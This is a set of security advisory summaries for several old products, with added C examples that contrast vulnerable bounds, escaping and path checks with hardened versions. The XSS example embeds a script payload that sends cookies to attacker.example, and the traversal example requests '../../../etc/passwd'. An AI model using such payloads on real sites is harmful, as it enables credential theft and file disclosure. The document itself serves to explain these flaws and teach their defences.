It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrect initialization of some variables in the application's PHP header (include) files, which lets a remote attacker supply the location of a file to be included. As a result, an attacker may be able to execute arbitrary PHP code in the context of the web server.
Due to improper handling of integer values while processing version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value in the version information it is possible to bypass the calculations that are meant to bound the value and cause an invalid (negative) index into an array of function pointers. As a result, an attacker may be able to execute a function at an attacker-controlled memory location. Note that a check of the form "index greater than the table size" does not reject negative values; the index must also be checked for being below zero (or compared as an unsigned quantity after that check).
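The following is an added example (not code from the affected product) showing the flaw described above on a hypothetical dispatch table: a signed version number is compared only against the upper bound, so a negative value passes and selects a function-pointer slot that lies before the table in memory. The handler names, the table, and the probe values are all constructed for illustration; the block computes the out-of-bounds slot offset rather than dereferencing it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed example: handlers selected by a version number taken from
 * untrusted input. All names are hypothetical. */
typedef int (*handler_fn)(void);

static int handle_v0(void) { return 0; }
static int handle_v1(void) { return 1; }
static int handle_v2(void) { return 2; }

static const handler_fn handlers[] = { handle_v0, handle_v1, handle_v2 };
#define NUM_HANDLERS (sizeof handlers / sizeof handlers[0])

/* Flawed check: only the upper bound is tested, and the comparison is done
 * as signed int, so a negative version is accepted. */
bool flawed_index_ok(int version)
{
    return version < (int)NUM_HANDLERS;   /* -1 < 3 is true: accepted */
}

/* Correct check: reject negatives explicitly, then compare as size_t. */
bool safe_index_ok(int version)
{
    if (version < 0)
        return false;
    return (size_t)version < NUM_HANDLERS;
}

/* Byte offset from the start of the table to the slot the flawed code would
 * load the function pointer from. Negative versions land before the table,
 * in whatever the linker placed there (possibly attacker-influenced data). */
ptrdiff_t slot_offset(int version)
{
    return (ptrdiff_t)version * (ptrdiff_t)sizeof(handler_fn);
}

/* Dispatch through the safe check; returns -1 for rejected versions. */
int dispatch(int version)
{
    if (!safe_index_ok(version))
        return -1;
    return handlers[version]();
}

int main(void)
{
    const int probes[] = { 0, 2, 3, -1, -65536 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int v = probes[i];
        printf("version %7d: flawed check %s, safe check %s, slot offset %ld bytes\n",
               v, flawed_index_ok(v) ? "accepts" : "rejects",
               safe_index_ok(v) ? "accepts" : "rejects",
               (long)slot_offset(v));
    }
    return 0;
}
```

Compared as signed, -1 sits "below" the table size, so the flawed check lets it through; the resulting load reads a pointer from sizeof(handler_fn) bytes before the table, which is exactly the "attacker-controlled location" the advisory refers to.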
This exploit overflows the Initialize member of the VMware 5.5.1 ActiveX control and runs calc.exe on Windows XP Pro SP2 (fully patched). It uses a crude approach to the bug: a huge buffer is filled with the address (pointer) of the attacker's buffer, and execution then trampolines through that address to the shellcode.
The IISProtect web administration interface does not properly sanitize user input before using it in database queries. This could allow SQL injection attacks against a Microsoft IIS server running IISProtect. Successful exploitation could result in compromise of the IISProtect server, attacks on the back-end database, or other consequences.
Prishtina FTP client is allegedly prone to a denial of service vulnerability caused by a buffer overflow when the client processes an FTP server banner of excessive length. A malicious, attacker-controlled server can exploit this by sending a specially crafted, over-long banner to a connecting user, crashing the target user's FTP client.
EServ is a web server that does not sufficiently prevent web users from viewing directory indexes. This may result in the disclosure of sensitive information: an attacker can send a GET request for a directory to the web server and view its index (file listing).
A malicious NASL script can break out of the established sandbox environment and execute arbitrary commands on the local system. This is possible due to a buffer overflow vulnerability in the 'libnasl' library used by Nessus. Exploitation requires that the malicious script be uploaded to the Nessus server as a plugin, which in turn requires the affected Nessus installation to have the 'plugins_upload' option enabled.
The issue is reportedly due to a lack of sufficient bounds checking on user-supplied data before it is copied into an internal buffer. Specifically, excessive data passed as the 'file' argument to the vulnerable Polymorph executable may, when copied, overrun the boundary of the destination buffer and corrupt adjacent memory. This vulnerability may be exploited to execute arbitrary attacker-supplied code.
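Both the FTP banner overflow above (Prishtina) and the 'file' argument overflow (Polymorph) are the same defect: an unbounded copy of attacker-controlled bytes into a fixed-size buffer. The following added example (constructed for this page, not code from either product) shows the vulnerable copy beside a bounded one, and a small FTP greeting parser that refuses over-long banners instead of truncating or overflowing. The buffer size, function names, and sample banners are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define BANNER_MAX 128   /* hypothetical fixed buffer size */

/* Vulnerable pattern (never call this with untrusted input): the banner or
 * argument is copied with no length check, so input of BANNER_MAX bytes or
 * more overruns buf and whatever sits next to it on the stack. */
void unsafe_copy(const char *src)
{
    char buf[BANNER_MAX];
    strcpy(buf, src);             /* overflow if strlen(src) >= BANNER_MAX */
    (void)buf;
}

/* Hardened: look for the terminator within the destination size first and
 * refuse over-length input rather than silently truncating it. */
bool safe_copy(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return false;
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)              /* no NUL within dstsz bytes: too long */
        return false;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return true;
}

/* Parse an FTP greeting line such as "220 text\r\n": validate the 3-digit
 * status code and copy the text into a bounded buffer with CR/LF removed.
 * Returns the status code, or -1 if the line is malformed or too long. */
int parse_banner(const char *line, char *text, size_t textsz)
{
    if (strlen(line) < 4 || line[3] != ' ')
        return -1;
    int code = 0;
    for (int i = 0; i < 3; i++) {
        if (line[i] < '0' || line[i] > '9')
            return -1;
        code = code * 10 + (line[i] - '0');
    }
    if (!safe_copy(text, textsz, line + 4))
        return -1;
    size_t n = strlen(text);
    while (n > 0 && (text[n - 1] == '\r' || text[n - 1] == '\n'))
        text[--n] = '\0';
    return code;
}

int main(void)
{
    char text[BANNER_MAX];
    char big[300];                        /* constructed over-long banner */
    memset(big, 'A', sizeof big);
    memcpy(big, "220 ", 4);
    big[sizeof big - 1] = '\0';

    printf("normal banner -> code %d, text \"%s\"\n",
           parse_banner("220 Welcome to constructed FTP\r\n", text, sizeof text), text);
    printf("%zu-byte banner -> %d (rejected instead of overflowing)\n",
           strlen(big), parse_banner(big, text, sizeof text));
    return 0;
}
```

The check is done against the destination size before any byte is written; with strcpy there is no point at which the code can notice the input is too large, which is why the advisory describes the adjacent memory being corrupted.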
XMB Forum fails to adequately filter script code from URL parameters, making it prone to cross-site scripting attacks. Attacker-supplied script code may be embedded in a malicious link to a specific XMB Forum script; when a user follows the link, the script runs in that user's browser within the forum's origin. This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users of a host running XMB Forum.
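An added example (not XMB Forum's code) of the filtering that the advisory says is missing: a URL parameter is reflected into a page fragment, once verbatim and once through an HTML escaper that neutralizes the characters which can close a text or attribute context. The fragment template, function names, and the sample parameter are constructed for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Escape the characters that let input break out of HTML text or attribute
 * context. Returns the number of bytes written (excluding the NUL), or
 * (size_t)-1 if dst is too small. */
size_t html_escape(const char *src, char *dst, size_t dstsz)
{
    size_t w = 0;
    for (const unsigned char *p = (const unsigned char *)src; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = one;      break;
        }
        size_t len = strlen(rep);
        if (w + len + 1 > dstsz)
            return (size_t)-1;
        memcpy(dst + w, rep, len);
        w += len;
    }
    dst[w] = '\0';
    return w;
}

/* Render the constructed fragment a forum page might emit for a reflected
 * URL parameter. With escape=false the parameter is inserted verbatim (the
 * vulnerable behaviour); with escape=true it passes through html_escape.
 * Returns 0 on success, -1 if the output does not fit. */
int render(const char *param, bool escape, char *out, size_t outsz)
{
    char esc[512];
    const char *v = param;
    if (escape) {
        if (html_escape(param, esc, sizeof esc) == (size_t)-1)
            return -1;
        v = esc;
    }
    int n = snprintf(out, outsz, "<p>Search results for: %s</p>", v);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

int main(void)
{
    /* Constructed payload of the kind a malicious link would carry. */
    const char *param = "<script>document.location='http://attacker.example/?c='+document.cookie</script>";
    char page[1024];
    render(param, false, page, sizeof page);
    printf("unfiltered: %s\n", page);
    render(param, true, page, sizeof page);
    printf("escaped:    %s\n", page);
    return 0;
}
```

Escaping at output time is what prevents the injected markup from being parsed as a script element; the escaped fragment still displays the attacker's text, but only as text.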
A directory traversal vulnerability has been reported for Example.com. The vulnerability is reportedly due to insufficient sanitization of user-supplied input used to select files under the 'protected' directory. This may allow a remote attacker to gain access to sensitive files outside the web root.
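An added example (not code from the reported site) of the sanitization the advisory says is missing: the requested path is resolved lexically against a fixed document root, segment by segment, and any ".." that would climb above the root is refused rather than stripped. The root path, the 'protected' subdirectory layout, and the request strings are constructed for illustration; the routine assumes the request has already been URL-decoded (so "%2e%2e" has become "..") and uses '/' as the only separator.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Resolve req against root without touching the filesystem: split on '/',
 * skip empty and "." segments, pop one segment on "..", and fail if ".."
 * would move above root. Writes the absolute path into out and returns
 * true, or returns false if the request escapes the root or does not fit.
 * Input must already be URL-decoded; on Windows '\\' would also need to be
 * treated as a separator. */
bool resolve_under_root(const char *root, const char *req, char *out, size_t outsz)
{
    char tmp[1024];
    if (strlen(req) >= sizeof tmp)
        return false;
    strcpy(tmp, req);

    size_t rl = strlen(root);
    while (rl > 0 && root[rl - 1] == '/')      /* drop trailing '/' */
        rl--;
    if (rl + 1 > outsz)
        return false;
    memcpy(out, root, rl);
    out[rl] = '\0';
    const size_t base = rl;                    /* out never gets shorter than this */

    for (char *seg = strtok(tmp, "/"); seg != NULL; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0)
            continue;
        if (strcmp(seg, "..") == 0) {
            if (strlen(out) == base)
                return false;                  /* would climb above the root */
            *strrchr(out, '/') = '\0';         /* pop the last segment */
            continue;
        }
        size_t cur = strlen(out), sl = strlen(seg);
        if (cur + 1 + sl + 1 > outsz)
            return false;
        out[cur] = '/';
        memcpy(out + cur + 1, seg, sl + 1);
    }
    return true;
}

int main(void)
{
    /* Constructed requests: one legitimate, one traversal attempt. */
    const char *root = "/var/www";
    const char *reqs[] = {
        "/protected/report.html",
        "/protected/../../../etc/passwd",
        "protected/../public/./index.html",
    };
    char path[512];
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++) {
        if (resolve_under_root(root, reqs[i], path, sizeof path))
            printf("%-36s -> %s\n", reqs[i], path);
        else
            printf("%-36s -> rejected (escapes %s)\n", reqs[i], root);
    }
    return 0;
}
```

Rejecting the request, rather than deleting ".." sequences, matters because a filter that removes ".." once can be defeated by inputs such as "....//" that collapse into ".." after the removal; resolving segments and checking the result against the root has no such rewrite to bypass.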